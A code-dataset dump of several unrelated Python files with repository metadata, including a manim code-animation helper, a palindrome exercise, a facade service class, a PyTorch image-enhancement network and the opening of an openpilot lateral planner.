xyz = None
xyz = cOmm.gather(xyz, root=mAster_rank)
if rAnk == mAster_rank:
for ___ in xyz:
if ___ is not None:
x, y, z = ___
break
ax.plot_surface(x, y, z, color=(0,0,1,0.5))
if title is None:
plt.title(f"dof#{self._dof_._i_} of {self._sf_.k}-form: {self._sf_.standard_properties.name}.")
else:
plt.title(title)
plt.tight_layout()
if saveto is not None and saveto != '':
plt.savefig(saveto, bbox_inches='tight')
plt.close()
else:
plt.show()
return fig | true | true |
1c3ca62019c75650299eb6536f4bfeab59e4ff4d | 5,160 | py | Python | code_replacement.py | laundmo/manim-code | 2758a092f95b0b3ebfabf049668310ecfef8238c | [
"MIT"
] | null | null | null | code_replacement.py | laundmo/manim-code | 2758a092f95b0b3ebfabf049668310ecfef8238c | [
"MIT"
] | null | null | null | code_replacement.py | laundmo/manim-code | 2758a092f95b0b3ebfabf049668310ecfef8238c | [
"MIT"
] | null | null | null | import re
from textwrap import dedent
from string_editor import LineColEditor
from manim import (
DOWN,
LEFT,
RIGHT,
UP,
Code,
Create,
CurvedArrow,
CyclicReplace,
FadeOut,
Scene,
SurroundingRectangle,
Uncreate,
)
def regex_line_span(regex, string, group=1):
m = re.search(regex, string)
lineno = string.count("\n", 0, m.start(group))
lines = string.split("\n")
previous_line_chars = sum(map(len, lines[0:lineno])) + len(lines[0:lineno]) - 1
char_start = (m.start(group) - 1) - previous_line_chars
char_stop = char_start + ((m.end(group) - 1) - (m.start(group) - 1))
return m, lineno, (char_start, char_stop)
class sliceabledict(dict):
def __getitem__(self, val):
if isinstance(val, slice):
return slice(self[val.start], self[val.stop])
return super().__getitem__(val)
def make_manim_map(string):
stripped = re.findall("( +|[^ ])", string)
char_manim_map = {}
count = 0
for i, c in enumerate(stripped):
for j, _ in enumerate(c):
char_manim_map[count + j] = i
count += len(c)
return sliceabledict(char_manim_map)
def mid(a: int, b: int) -> int:
return a + (abs(a - b) / 2)
class ReplacementCode:
COLORS = ["#FF0000", "#00FF00", "#0000FF", "#FF00FF", "#FFFF00", "#00FFFF"]
def __init__(self, scene, code):
self.scene = scene
self.code = None
self.color_index = 0
self.update(code.replace("\n", " \n"))
@property
def color(self):
col = self.COLORS[self.color_index % len(self.COLORS)]
self.color_index += 1
return col
def update(self, code):
if self.code:
self.scene.remove(self.code)
self.code = Code(
code=dedent(code),
scale_factor=1,
tab_width=4,
language="Python",
font="Monospace",
line_spacing=0.6,
)
self.scene.add(self.code)
def normalise_col(self, *args):
return [(arg, arg + 1) if isinstance(arg, int) else arg for arg in args]
def decide_directions(self, source_line, source_col, dest_line, dest_col):
source_col, dest_col = self.normalise_col(source_col, dest_col)
linediff = source_line - dest_line
coldiff = mid(*source_col) - mid(*dest_col)
if abs(linediff) > abs(coldiff):
if linediff > 0:
direction = (DOWN, UP)
else:
direction = (UP, DOWN)
else:
if coldiff > 0:
direction = (RIGHT, LEFT)
else:
direction = (LEFT, RIGHT)
return direction
def show_from_spans(self, source_line, source_col, dest_line, dest_col):
source_col, dest_col = self.normalise_col(source_col, dest_col)
direction = self.decide_directions(source_line, source_col, dest_line, dest_col)
lines = LineColEditor(self.code.code_string)
source_manim_map = make_manim_map(lines[source_line])
dest_manim_map = make_manim_map(lines[dest_line])
self.show_and_replace(
self.code.code.chars[source_line][
source_manim_map[slice(*source_col)]
],
self.code.code.chars[dest_line][
dest_manim_map[slice(*dest_col)]
],
direction,
color=self.color,
)
self.color_index += 1
lines = LineColEditor(self.code.code_string)
lines[dest_line][slice(*dest_col)] = lines[source_line][slice(*source_col)]
self.update(str(lines))
def show_from_regex(self, source_re, dest_re, alternative_dest=None):
source_match, source_line, span = regex_line_span(
source_re, self.code.code_string
)
dest_match, dest_line, span2 = regex_line_span(dest_re, self.code.code_string)
direction = self.decide_directions(source_line, span, dest_line, span2)
self.show_from_spans(source_line, span, dest_line, span2)
def from_to_chars(self, chars1, chars2, direction, color="#FFFFFF"):
rect1 = SurroundingRectangle(chars1, color=color)
rect2 = SurroundingRectangle(chars2, color=color)
arrow = CurvedArrow(
rect1.get_edge_center(direction[1]),
rect2.get_edge_center(direction[0]),
color=color,
)
self.scene.play(Create(rect1), Create(rect2), Create(arrow))
self.scene.wait(2)
return (Uncreate(rect1), Uncreate(rect2), Uncreate(arrow))
def show_and_replace(self, chars1, chars2, direction, color="#FFFFFF", run_time=2):
uncreate = self.from_to_chars(chars1, chars2, direction, color=color)
self.scene.play(
CyclicReplace(
chars1.copy(),
chars2,
run_time=run_time,
),
FadeOut(chars2),
*uncreate
)
def __enter__(self):
return self
def __exit__(self, *arg):
if self.code:
self.scene.remove(self.code)
| 30.898204 | 88 | 0.588953 | import re
from textwrap import dedent
from string_editor import LineColEditor
from manim import (
DOWN,
LEFT,
RIGHT,
UP,
Code,
Create,
CurvedArrow,
CyclicReplace,
FadeOut,
Scene,
SurroundingRectangle,
Uncreate,
)
def regex_line_span(regex, string, group=1):
m = re.search(regex, string)
lineno = string.count("\n", 0, m.start(group))
lines = string.split("\n")
previous_line_chars = sum(map(len, lines[0:lineno])) + len(lines[0:lineno]) - 1
char_start = (m.start(group) - 1) - previous_line_chars
char_stop = char_start + ((m.end(group) - 1) - (m.start(group) - 1))
return m, lineno, (char_start, char_stop)
class sliceabledict(dict):
def __getitem__(self, val):
if isinstance(val, slice):
return slice(self[val.start], self[val.stop])
return super().__getitem__(val)
def make_manim_map(string):
stripped = re.findall("( +|[^ ])", string)
char_manim_map = {}
count = 0
for i, c in enumerate(stripped):
for j, _ in enumerate(c):
char_manim_map[count + j] = i
count += len(c)
return sliceabledict(char_manim_map)
def mid(a: int, b: int) -> int:
return a + (abs(a - b) / 2)
class ReplacementCode:
COLORS = ["#FF0000", "#00FF00", "#0000FF", "#FF00FF", "#FFFF00", "#00FFFF"]
def __init__(self, scene, code):
self.scene = scene
self.code = None
self.color_index = 0
self.update(code.replace("\n", " \n"))
@property
def color(self):
col = self.COLORS[self.color_index % len(self.COLORS)]
self.color_index += 1
return col
def update(self, code):
if self.code:
self.scene.remove(self.code)
self.code = Code(
code=dedent(code),
scale_factor=1,
tab_width=4,
language="Python",
font="Monospace",
line_spacing=0.6,
)
self.scene.add(self.code)
def normalise_col(self, *args):
return [(arg, arg + 1) if isinstance(arg, int) else arg for arg in args]
def decide_directions(self, source_line, source_col, dest_line, dest_col):
source_col, dest_col = self.normalise_col(source_col, dest_col)
linediff = source_line - dest_line
coldiff = mid(*source_col) - mid(*dest_col)
if abs(linediff) > abs(coldiff):
if linediff > 0:
direction = (DOWN, UP)
else:
direction = (UP, DOWN)
else:
if coldiff > 0:
direction = (RIGHT, LEFT)
else:
direction = (LEFT, RIGHT)
return direction
def show_from_spans(self, source_line, source_col, dest_line, dest_col):
source_col, dest_col = self.normalise_col(source_col, dest_col)
direction = self.decide_directions(source_line, source_col, dest_line, dest_col)
lines = LineColEditor(self.code.code_string)
source_manim_map = make_manim_map(lines[source_line])
dest_manim_map = make_manim_map(lines[dest_line])
self.show_and_replace(
self.code.code.chars[source_line][
source_manim_map[slice(*source_col)]
],
self.code.code.chars[dest_line][
dest_manim_map[slice(*dest_col)]
],
direction,
color=self.color,
)
self.color_index += 1
lines = LineColEditor(self.code.code_string)
lines[dest_line][slice(*dest_col)] = lines[source_line][slice(*source_col)]
self.update(str(lines))
def show_from_regex(self, source_re, dest_re, alternative_dest=None):
source_match, source_line, span = regex_line_span(
source_re, self.code.code_string
)
dest_match, dest_line, span2 = regex_line_span(dest_re, self.code.code_string)
direction = self.decide_directions(source_line, span, dest_line, span2)
self.show_from_spans(source_line, span, dest_line, span2)
def from_to_chars(self, chars1, chars2, direction, color="#FFFFFF"):
rect1 = SurroundingRectangle(chars1, color=color)
rect2 = SurroundingRectangle(chars2, color=color)
arrow = CurvedArrow(
rect1.get_edge_center(direction[1]),
rect2.get_edge_center(direction[0]),
color=color,
)
self.scene.play(Create(rect1), Create(rect2), Create(arrow))
self.scene.wait(2)
return (Uncreate(rect1), Uncreate(rect2), Uncreate(arrow))
def show_and_replace(self, chars1, chars2, direction, color="#FFFFFF", run_time=2):
uncreate = self.from_to_chars(chars1, chars2, direction, color=color)
self.scene.play(
CyclicReplace(
chars1.copy(),
chars2,
run_time=run_time,
),
FadeOut(chars2),
*uncreate
)
def __enter__(self):
return self
def __exit__(self, *arg):
if self.code:
self.scene.remove(self.code)
| true | true |
1c3ca63b598327033ec30a57a8658b4017381c90 | 816 | py | Python | CS01_SprintChallenge/csCheckPalindrome.py | JeffreyAsuncion/CSPT15_ComputerScienceFundamentals | 6b8b847af6658125fa548b0133626333f255e2da | [
"MIT"
] | null | null | null | CS01_SprintChallenge/csCheckPalindrome.py | JeffreyAsuncion/CSPT15_ComputerScienceFundamentals | 6b8b847af6658125fa548b0133626333f255e2da | [
"MIT"
] | null | null | null | CS01_SprintChallenge/csCheckPalindrome.py | JeffreyAsuncion/CSPT15_ComputerScienceFundamentals | 6b8b847af6658125fa548b0133626333f255e2da | [
"MIT"
] | null | null | null | """
A palindrome is a word, phrase, number, or another sequence of characters
that reads the same backward or forward.
This includes capital letters, punctuation, and other special characters.
Given a string, write a function that checks if the input is a valid palindrome.
Examples:
csCheckPalindrome("racecar") -> true
csCheckPalindrome("anna") -> true
csCheckPalindrome("12345") -> false
csCheckPalindrome("12321") -> true
[execution time limit] 4 seconds (py3)
[input] string input_str
[output] boolean
"""
def csCheckPalindrome(input_str):
return input_str == input_str[::-1]
print(csCheckPalindrome("racecar"))# -> true
print(csCheckPalindrome("anna"))# -> true
print(csCheckPalindrome("12345"))# -> false
print(csCheckPalindrome("12321"))# -> true
#[execution time limit] 4 seconds (py3)
| 24.727273 | 80 | 0.738971 |
def csCheckPalindrome(input_str):
return input_str == input_str[::-1]
print(csCheckPalindrome("racecar"))
print(csCheckPalindrome("anna"))
print(csCheckPalindrome("12345"))
print(csCheckPalindrome("12321"))
| true | true |
1c3ca6606ef472e02ecb76519c6d63d47341f19d | 1,097 | py | Python | pip_services3_facade/services/PartitionFacadeService.py | pip-services3-python/pip-services3-facade-python | dfe7db79f525a1d823637c1e1d030a6333e19aa8 | [
"MIT"
] | null | null | null | pip_services3_facade/services/PartitionFacadeService.py | pip-services3-python/pip-services3-facade-python | dfe7db79f525a1d823637c1e1d030a6333e19aa8 | [
"MIT"
] | null | null | null | pip_services3_facade/services/PartitionFacadeService.py | pip-services3-python/pip-services3-facade-python | dfe7db79f525a1d823637c1e1d030a6333e19aa8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from abc import abstractmethod
from pip_services3_commons.config import ConfigParams
from pip_services3_commons.refer import IReferences, Descriptor
from .IFacadeService import IFacadeService
from .FacadeService import FacadeService
class PartitionFacadeService(FacadeService):
_parent: IFacadeService
def __init__(self):
super(PartitionFacadeService, self).__init__()
self._dependency_resolver.put('parent', Descriptor('pip-services', 'facade-service', 'default', '*', '*'))
def configure(self, config):
super().configure(config)
self._dependency_resolver.configure(config)
def set_references(self, references):
super().set_references(references)
self._parent = self._dependency_resolver.get_one_required('parent')
self._parent.register_middleware_for_path(self._root_path, self._partition)
self._register()
def get_root_path(self):
return self._parent.get_root_path() + self._root_path
def _register(self):
"""
Override in child classes
"""
| 30.472222 | 114 | 0.7165 |
from abc import abstractmethod
from pip_services3_commons.config import ConfigParams
from pip_services3_commons.refer import IReferences, Descriptor
from .IFacadeService import IFacadeService
from .FacadeService import FacadeService
class PartitionFacadeService(FacadeService):
_parent: IFacadeService
def __init__(self):
super(PartitionFacadeService, self).__init__()
self._dependency_resolver.put('parent', Descriptor('pip-services', 'facade-service', 'default', '*', '*'))
def configure(self, config):
super().configure(config)
self._dependency_resolver.configure(config)
def set_references(self, references):
super().set_references(references)
self._parent = self._dependency_resolver.get_one_required('parent')
self._parent.register_middleware_for_path(self._root_path, self._partition)
self._register()
def get_root_path(self):
return self._parent.get_root_path() + self._root_path
def _register(self):
| true | true |
1c3ca6c3897643e98271b6be85be2e7bae3b2591 | 10,077 | py | Python | raw_ted.py | deshwalmahesh/CURL---cpu-gpu | f4e87275b6cce556b9e04a188cf7ae13d810d82a | [
"BSD-3-Clause"
] | 125 | 2020-10-16T12:25:59.000Z | 2022-03-22T06:04:57.000Z | raw_ted.py | deshwalmahesh/CURL---cpu-gpu | f4e87275b6cce556b9e04a188cf7ae13d810d82a | [
"BSD-3-Clause"
] | 22 | 2020-10-19T10:40:05.000Z | 2022-02-14T12:01:46.000Z | raw_ted.py | deshwalmahesh/CURL---cpu-gpu | f4e87275b6cce556b9e04a188cf7ae13d810d82a | [
"BSD-3-Clause"
] | 23 | 2020-11-05T09:23:52.000Z | 2022-03-24T08:00:50.000Z | # -*- coding: utf-8 -*-
'''
This is a PyTorch implementation of CURL: Neural Curve Layers for Global Image Enhancement
https://arxiv.org/pdf/1911.13175.pdf
Please cite paper if you use this code.
Tested with Pytorch 1.7.1, Python 3.7.9
Authors: Sean Moran (sean.j.moran@gmail.com), 2020
'''
import numpy as np
import torch
import torch.nn as nn
from math import sqrt
from torch.nn import init
from torch.autograd import Variable
import torch.nn.functional as F
class Flatten(nn.Module):
def forward(self, x):
"""Flatten a Tensor to a Vector
:param x: Tensor
:returns: 1D Tensor
:rtype: Tensor
"""
return x.view(x.size()[0], -1)
class TED(nn.Module):
def __init__(self):
"""Initialisation function for the Transformed Encoder Decoder (TED)
:returns: N/A
:rtype: N/A
"""
super().__init__()
def layer(nIn, nOut, k, s, p, d=1):
return nn.Sequential(nn.Conv2d(nIn, nOut, k, s, p, d), nn.LeakyReLU(inplace=True))
self.conv1 = nn.Conv2d(16, 64, 1)
self.conv2 = nn.Conv2d(32, 64, 1)
self.conv3 = nn.Conv2d(64, 64, 1)
self.mid_net2_1 = MidNet2(in_channels=16)
self.mid_net4_1 = MidNet4(in_channels=16)
self.local_net = LocalNet(16)
self.dconv_down1 = LocalNet(4, 16)
self.dconv_down2 = LocalNet(16, 32)
self.dconv_down3 = LocalNet(32, 64)
self.dconv_down4 = LocalNet(64, 128)
self.dconv_down5 = LocalNet(128, 128)
self.maxpool = nn.MaxPool2d(2, padding=0)
self.upsample = nn.UpsamplingNearest2d(scale_factor=2)
self.up_conv1x1_1 = nn.Conv2d(128, 128, 1)
self.up_conv1x1_2 = nn.Conv2d(64, 64, 1)
self.up_conv1x1_3 = nn.Conv2d(32, 32, 1)
self.up_conv1x1_4 = nn.Conv2d(16, 16, 1)
self.dconv_up4 = LocalNet(128, 64)
self.dconv_up3 = LocalNet(64, 32)
self.dconv_up2 = LocalNet(32, 16)
self.dconv_up1 = LocalNet(32, 16)
self.conv_last = LocalNet(16, 64)
self.conv_fuse1 = nn.Conv2d(208, 16, 1)
self.glob_net1 = nn.Sequential(
layer(16, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.AdaptiveAvgPool2d(1),
Flatten(),
nn.Dropout(0.5),
nn.Linear(64, 64),
)
def forward(self, x):
"""Forward function for the TED network
:param x: input image
:returns: convolutional features
:rtype: Tensor
"""
x_in_tile = x.repeat(1, 4, 1, 1)
conv1 = self.dconv_down1(x)
x = self.maxpool(conv1)
conv2 = self.dconv_down2(x)
x = self.maxpool(conv2)
conv3 = self.dconv_down3(x)
x = self.maxpool(conv3)
conv4 = self.dconv_down4(x)
x = self.maxpool(conv4)
x = self.dconv_down5(x)
x = self.up_conv1x1_1(self.upsample(x))
if x.shape[3] != conv4.shape[3] and x.shape[2] != conv4.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv4.shape[2]:
x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv4.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
del conv4
x = self.dconv_up4(x)
x = self.up_conv1x1_2(self.upsample(x))
if x.shape[3] != conv3.shape[3] and x.shape[2] != conv3.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv3.shape[2]:
x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv3.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
x = self.dconv_up3(x)
x = self.up_conv1x1_3(self.upsample(x))
del conv3
if x.shape[3] != conv2.shape[3] and x.shape[2] != conv2.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv2.shape[2]:
x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv2.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
x = self.dconv_up2(x)
x = self.up_conv1x1_4(self.upsample(x))
del conv2
mid_features1 = self.mid_net2_1(conv1)
mid_features2 = self.mid_net4_1(conv1)
glob_features = self.glob_net1(conv1)
glob_features = glob_features.unsqueeze(2)
glob_features = glob_features.unsqueeze(3)
glob_features = glob_features.repeat(
1, 1, mid_features1.shape[2], mid_features1.shape[3])
fuse = torch.cat(
(conv1, mid_features1, mid_features2, glob_features), 1)
conv1_fuse = self.conv_fuse1(fuse)
if x.shape[3] != conv1.shape[3] and x.shape[2] != conv1.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv1.shape[2]:
x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv1.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
x = torch.cat([x, conv1_fuse], dim=1)
del conv1
x = self.dconv_up1(x)
x = x+x_in_tile
out = self.conv_last(x)
return out
class LocalNet(nn.Module):
def forward(self, x_in):
"""Defines a double convolution
:param x_in: input convolutional features
:returns: convolutional features
:rtype: Tensor
"""
x = self.lrelu(self.conv1(self.refpad(x_in)))
x = self.lrelu(self.conv2(self.refpad(x)))
return x
def __init__(self, in_channels=16, out_channels=64):
"""Initialisation function
:param in_channels: number of input channels
:param out_channels: number of output channels
:returns: N/A
:rtype: N/A
"""
super(LocalNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels, out_channels, 3, 1, 0, 1)
self.conv2 = nn.Conv2d(out_channels, out_channels, 3, 1, 0, 1)
self.lrelu = nn.LeakyReLU()
self.refpad = nn.ReflectionPad2d(1)
class MidNet2(nn.Module):
def forward(self, x_in):
"""Network with dilation rate 2
:param x_in: input convolutional features
:returns: processed convolutional features
:rtype: Tensor
"""
x = self.lrelu(self.conv1((x_in)))
x = self.lrelu(self.conv2((x)))
x = self.lrelu(self.conv3(x))
x = self.conv4(x)
return x
def __init__(self, in_channels=16):
"""FIXME! briefly describe function
:param in_channels: Input channels
:returns: N/A
:rtype: N/A
"""
super(MidNet2, self).__init__()
self.lrelu = nn.LeakyReLU()
self.conv1 = nn.Conv2d(in_channels, 64, 3, 1, 2, 2)
self.conv2 = nn.Conv2d(64, 64, 3, 1, 2, 2)
self.conv3 = nn.Conv2d(64, 64, 3, 1, 2, 2)
self.conv4 = nn.Conv2d(64, 64, 3, 1, 2, 2)
class MidNet4(nn.Module):
def forward(self, x_in):
"""Network with dilation rate 4
:param x_in: input convolutional features
:returns: processed convolutional features
:rtype: Tensor
"""
x = self.lrelu(self.conv1((x_in)))
x = self.lrelu(self.conv2((x)))
x = self.lrelu(self.conv3(x))
x = self.conv4(x)
return x
def __init__(self, in_channels=16):
"""FIXME! briefly describe function
:param in_channels: Input channels
:returns: N/A
:rtype: N/A
"""
super(MidNet4, self).__init__()
self.lrelu = nn.LeakyReLU()
self.conv1 = nn.Conv2d(in_channels, 64, 3, 1, 4, 4)
self.conv2 = nn.Conv2d(64, 64, 3, 1, 4, 4)
self.conv3 = nn.Conv2d(64, 64, 3, 1, 4, 4)
self.conv4 = nn.Conv2d(64, 64, 3, 1, 4, 4)
class SimpleUpsampler(nn.Sequential):
def __init__(self, scale):
"""Pixelshuffle upsampling
:param scale: scale of upsampling
:returns: upsampled image
:rtype: Tensor
"""
m = []
m.append(nn.PixelShuffle(scale))
super(SimpleUpsampler, self).__init__(*m)
def DownSamplingShuffle(x):
"""Pixelshuffle downsample
:param x: RAW image
:returns: RAW image shuffled to 4 channels
:rtype: Tensor
"""
[N, C, W, H] = x.shape
x1 = x[:, :, 0:W:2, 0:H:2]
x2 = x[:, :, 0:W:2, 1:H:2]
x3 = x[:, :, 1:W:2, 0:H:2]
x4 = x[:, :, 1:W:2, 1:H:2]
return torch.cat((x1, x2, x3, x4), 1)
# Model definition
class TEDModel(nn.Module):
def __init__(self):
"""Initialisation function from the TED model
:returns: N/A
:rtype: N/A
"""
super(TEDModel, self).__init__()
self.ted = TED()
self.final_conv = nn.Conv2d(16, 64, 3, 1, 0, 1)
self.refpad = nn.ReflectionPad2d(1)
def forward(self, image):
"""Forward function for TED
:param image: image tensor to process
:returns: convolutional features
:rtype: Tensor
"""
image_shuffled = DownSamplingShuffle(image)
output_image = self.ted(image_shuffled.float())
upsampler = SimpleUpsampler(2)
upsampler = nn.Sequential(*upsampler)
output_image = upsampler(output_image)
return self.final_conv(self.refpad(output_image))
| 28.873926 | 95 | 0.545103 |
import numpy as np
import torch
import torch.nn as nn
from math import sqrt
from torch.nn import init
from torch.autograd import Variable
import torch.nn.functional as F
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size()[0], -1)
class TED(nn.Module):
def __init__(self):
super().__init__()
def layer(nIn, nOut, k, s, p, d=1):
return nn.Sequential(nn.Conv2d(nIn, nOut, k, s, p, d), nn.LeakyReLU(inplace=True))
self.conv1 = nn.Conv2d(16, 64, 1)
self.conv2 = nn.Conv2d(32, 64, 1)
self.conv3 = nn.Conv2d(64, 64, 1)
self.mid_net2_1 = MidNet2(in_channels=16)
self.mid_net4_1 = MidNet4(in_channels=16)
self.local_net = LocalNet(16)
self.dconv_down1 = LocalNet(4, 16)
self.dconv_down2 = LocalNet(16, 32)
self.dconv_down3 = LocalNet(32, 64)
self.dconv_down4 = LocalNet(64, 128)
self.dconv_down5 = LocalNet(128, 128)
self.maxpool = nn.MaxPool2d(2, padding=0)
self.upsample = nn.UpsamplingNearest2d(scale_factor=2)
self.up_conv1x1_1 = nn.Conv2d(128, 128, 1)
self.up_conv1x1_2 = nn.Conv2d(64, 64, 1)
self.up_conv1x1_3 = nn.Conv2d(32, 32, 1)
self.up_conv1x1_4 = nn.Conv2d(16, 16, 1)
self.dconv_up4 = LocalNet(128, 64)
self.dconv_up3 = LocalNet(64, 32)
self.dconv_up2 = LocalNet(32, 16)
self.dconv_up1 = LocalNet(32, 16)
self.conv_last = LocalNet(16, 64)
self.conv_fuse1 = nn.Conv2d(208, 16, 1)
self.glob_net1 = nn.Sequential(
layer(16, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.MaxPool2d(kernel_size=3, stride=2, padding=1),
layer(64, 64, 3, 2, 1),
nn.AdaptiveAvgPool2d(1),
Flatten(),
nn.Dropout(0.5),
nn.Linear(64, 64),
)
def forward(self, x):
x_in_tile = x.repeat(1, 4, 1, 1)
conv1 = self.dconv_down1(x)
x = self.maxpool(conv1)
conv2 = self.dconv_down2(x)
x = self.maxpool(conv2)
conv3 = self.dconv_down3(x)
x = self.maxpool(conv3)
conv4 = self.dconv_down4(x)
x = self.maxpool(conv4)
x = self.dconv_down5(x)
x = self.up_conv1x1_1(self.upsample(x))
if x.shape[3] != conv4.shape[3] and x.shape[2] != conv4.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv4.shape[2]:
x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv4.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
del conv4
x = self.dconv_up4(x)
x = self.up_conv1x1_2(self.upsample(x))
if x.shape[3] != conv3.shape[3] and x.shape[2] != conv3.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv3.shape[2]:
x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv3.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
x = self.dconv_up3(x)
x = self.up_conv1x1_3(self.upsample(x))
del conv3
if x.shape[3] != conv2.shape[3] and x.shape[2] != conv2.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv2.shape[2]:
x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv2.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
x = self.dconv_up2(x)
x = self.up_conv1x1_4(self.upsample(x))
del conv2
mid_features1 = self.mid_net2_1(conv1)
mid_features2 = self.mid_net4_1(conv1)
glob_features = self.glob_net1(conv1)
glob_features = glob_features.unsqueeze(2)
glob_features = glob_features.unsqueeze(3)
glob_features = glob_features.repeat(
1, 1, mid_features1.shape[2], mid_features1.shape[3])
fuse = torch.cat(
(conv1, mid_features1, mid_features2, glob_features), 1)
conv1_fuse = self.conv_fuse1(fuse)
if x.shape[3] != conv1.shape[3] and x.shape[2] != conv1.shape[2]:
x = torch.nn.functional.pad(x, (1, 0, 0, 1))
elif x.shape[2] != conv1.shape[2]:
x = torch.nn.functional.pad(x, (0, 0, 0, 1))
elif x.shape[3] != conv1.shape[3]:
x = torch.nn.functional.pad(x, (1, 0, 0, 0))
x = torch.cat([x, conv1_fuse], dim=1)
del conv1
x = self.dconv_up1(x)
x = x+x_in_tile
out = self.conv_last(x)
return out
class LocalNet(nn.Module):
def forward(self, x_in):
x = self.lrelu(self.conv1(self.refpad(x_in)))
x = self.lrelu(self.conv2(self.refpad(x)))
return x
def __init__(self, in_channels=16, out_channels=64):
super(LocalNet, self).__init__()
self.conv1 = nn.Conv2d(in_channels, out_channels, 3, 1, 0, 1)
self.conv2 = nn.Conv2d(out_channels, out_channels, 3, 1, 0, 1)
self.lrelu = nn.LeakyReLU()
self.refpad = nn.ReflectionPad2d(1)
class MidNet2(nn.Module):
def forward(self, x_in):
x = self.lrelu(self.conv1((x_in)))
x = self.lrelu(self.conv2((x)))
x = self.lrelu(self.conv3(x))
x = self.conv4(x)
return x
def __init__(self, in_channels=16):
super(MidNet2, self).__init__()
self.lrelu = nn.LeakyReLU()
self.conv1 = nn.Conv2d(in_channels, 64, 3, 1, 2, 2)
self.conv2 = nn.Conv2d(64, 64, 3, 1, 2, 2)
self.conv3 = nn.Conv2d(64, 64, 3, 1, 2, 2)
self.conv4 = nn.Conv2d(64, 64, 3, 1, 2, 2)
class MidNet4(nn.Module):
def forward(self, x_in):
x = self.lrelu(self.conv1((x_in)))
x = self.lrelu(self.conv2((x)))
x = self.lrelu(self.conv3(x))
x = self.conv4(x)
return x
def __init__(self, in_channels=16):
super(MidNet4, self).__init__()
self.lrelu = nn.LeakyReLU()
self.conv1 = nn.Conv2d(in_channels, 64, 3, 1, 4, 4)
self.conv2 = nn.Conv2d(64, 64, 3, 1, 4, 4)
self.conv3 = nn.Conv2d(64, 64, 3, 1, 4, 4)
self.conv4 = nn.Conv2d(64, 64, 3, 1, 4, 4)
class SimpleUpsampler(nn.Sequential):
def __init__(self, scale):
m = []
m.append(nn.PixelShuffle(scale))
super(SimpleUpsampler, self).__init__(*m)
def DownSamplingShuffle(x):
[N, C, W, H] = x.shape
x1 = x[:, :, 0:W:2, 0:H:2]
x2 = x[:, :, 0:W:2, 1:H:2]
x3 = x[:, :, 1:W:2, 0:H:2]
x4 = x[:, :, 1:W:2, 1:H:2]
return torch.cat((x1, x2, x3, x4), 1)
class TEDModel(nn.Module):
def __init__(self):
super(TEDModel, self).__init__()
self.ted = TED()
self.final_conv = nn.Conv2d(16, 64, 3, 1, 0, 1)
self.refpad = nn.ReflectionPad2d(1)
def forward(self, image):
image_shuffled = DownSamplingShuffle(image)
output_image = self.ted(image_shuffled.float())
upsampler = SimpleUpsampler(2)
upsampler = nn.Sequential(*upsampler)
output_image = upsampler(output_image)
return self.final_conv(self.refpad(output_image))
| true | true |
1c3ca89898254300ae55bd6dd429dc7076b83741 | 11,070 | py | Python | selfdrive/controls/lib/lateral_planner.py | keijikage/openpilot | 4ed31ab245bdfc8a38566ed24e275b6bd8a06c23 | [
"MIT"
] | 1 | 2021-08-15T18:21:45.000Z | 2021-08-15T18:21:45.000Z | selfdrive/controls/lib/lateral_planner.py | keijikage/openpilot | 4ed31ab245bdfc8a38566ed24e275b6bd8a06c23 | [
"MIT"
] | null | null | null | selfdrive/controls/lib/lateral_planner.py | keijikage/openpilot | 4ed31ab245bdfc8a38566ed24e275b6bd8a06c23 | [
"MIT"
] | 6 | 2021-06-25T04:56:29.000Z | 2022-01-11T00:37:15.000Z | import os
import math
import numpy as np
from common.realtime import sec_since_boot, DT_MDL
from common.numpy_fast import interp
from selfdrive.swaglog import cloudlog
from selfdrive.controls.lib.lateral_mpc import libmpc_py
from selfdrive.controls.lib.drive_helpers import CONTROL_N, MPC_COST_LAT, LAT_MPC_N, CAR_ROTATION_RADIUS
from selfdrive.controls.lib.lane_planner import LanePlanner, TRAJECTORY_SIZE
from selfdrive.config import Conversions as CV
import cereal.messaging as messaging
from cereal import log
LaneChangeState = log.LateralPlan.LaneChangeState
LaneChangeDirection = log.LateralPlan.LaneChangeDirection
LOG_MPC = os.environ.get('LOG_MPC', False)
